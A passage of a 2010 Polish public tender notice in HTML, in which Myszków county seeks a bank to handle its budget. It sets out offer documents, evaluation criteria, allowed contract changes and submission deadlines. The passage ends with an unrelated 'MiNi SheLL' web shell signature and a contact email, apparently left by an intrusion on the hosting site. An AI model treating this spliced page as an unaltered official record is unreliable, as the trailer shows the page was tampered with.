Wykonawca powinien złożyć wypełniony pismem maszynowym lub czytelnym pismem odręcznym, opieczętowany  i  podpisany przez osobę uprawnioną /osoby uprawnione/  do reprezentowania  wykonawcy  formularz ofertowy z wykorzystaniem wzoru - Załącznika Nr 1 do SIWZ wraz  z dokumentami i oświadczeniami wymienionymi w SIWZ. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy na wykonywanie bankowej obsługi budżetu stanowi  Załącznik Nr 4 do SIWZ, który musi być podpisany i opieczętowany przez wykonawcę i dołączony do oferty. 
Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy najmu   stanowi  Załącznik Nr 5 do SIWZ. Wykonawca, który zamierza prowadzić punkt kasowy  w siedzibie Starostwa Powiatowego w Myszkowie jest zobowiązany dołączyć do oferty podpisany i opieczętowany załącznik Nr 5 do SIWZ.
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza jest zobowiązany dostarczyć projekt umowy z wprowadzonymi istotnymi dla stron postanowieniami stanowiącymi załączniki do SIWZ i uzgodnić ostateczną treść umowy, w terminie 7 dni od momentu powiadomienia go o wybraniu oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - inne usługi oferowane przez Bank - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany postanowień umowy w stosunku do treści umowy na zasadach  określonych w art.144 ust.1 ustawy Prawo zamówień publicznych.
Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian. Zmiany dotyczyć mogą zakresu usług stanowiących przedmiot umowy, jeżeli wynikają   z następujących okoliczności:
a)podyktowane zostaną zmianami przepisów prawa, wprowadzonymi po podpisaniu niniejszej umowy,
b)na Powiat Myszkowski zostaną nałożone nowe zadania lub zmieni się struktura organizacyjna Powiatu Myszkowskiego,
c)pojawią się nowe korzystne dla Powiatu Myszkowskiego produkty bankowe lub rozwiązania organizacyjne, których wykorzystanie będzie korzystne dla Powiatu Myszkowskiego,
d)wprowadzona zostanie modyfikacja systemów informatycznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatmyszkowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Myszkowie ul. Pułaskiego 6; 42-300 Myszków, pokój 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 10:00, miejsce: Starostwo Powiatowe w Myszkowie ul. Pułaskiego 6; 42-300 Myszków, Kancelaria Ogólna pokój nr 6 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com